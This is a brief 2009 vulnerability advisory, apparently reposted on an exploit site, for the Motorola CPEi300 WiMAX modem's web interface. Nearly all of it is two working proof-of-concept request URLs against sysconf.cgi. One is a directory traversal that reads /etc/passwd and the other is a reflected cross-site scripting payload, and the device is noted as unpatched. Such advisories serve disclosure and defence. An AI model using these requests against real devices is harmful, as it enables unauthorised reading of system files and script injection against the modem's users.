Motorola Wimax modem CPEi300 (FD-XSS) Multiple Vulnerabilities
2009-01-29 22:33:22#####################################################################################
#
# Name : Motorola Wimax modem CPEi300 Multiple Vulnerabilities
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Homepage : http://www.xc0re.net
#
#####################################################################################
[Note: User needs to logged in! ]
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[+] Directory traversal
http://Hostname/cgi-bin/sysconf.cgi?page=../../../etc/passwd&action=request&sid=AeoFSFoI4lDs
[+] XSS
http://Hostname/cgi-bin/sysconf.cgi?page="><script>alert(1);</script>"&action=request&sid=AeoFSFoI4lDs
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.